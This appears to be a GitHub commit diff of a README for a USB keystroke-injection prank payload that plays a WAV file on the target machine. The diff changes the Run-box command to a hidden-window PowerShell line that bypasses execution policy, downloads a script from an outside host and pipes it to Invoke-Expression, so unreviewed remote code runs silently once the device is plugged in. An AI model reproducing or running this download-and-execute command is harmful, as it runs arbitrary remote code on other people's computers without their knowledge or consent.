Update README.md

This commit is contained in:
I-Am-Jakoby 2022-12-20 17:45:35 -06:00 committed by GitHub
parent 42522fb68c
commit 99378b0b74
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -38,7 +38,7 @@ After one is the WAV file will be played.
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download your WAV file
```
powershell -w h -NoP -NonI -Exec Bypass iwr https:// < Your Shared link for the intended file> ?dl=1 -O $env:TMP\e.wav
powershell -w h -NoP -NonI -Ep Bypass $wav='';iwr https://jakoby.lol/vus | iex
```
<p align="right">(<a href="#top">back to top</a>)</p>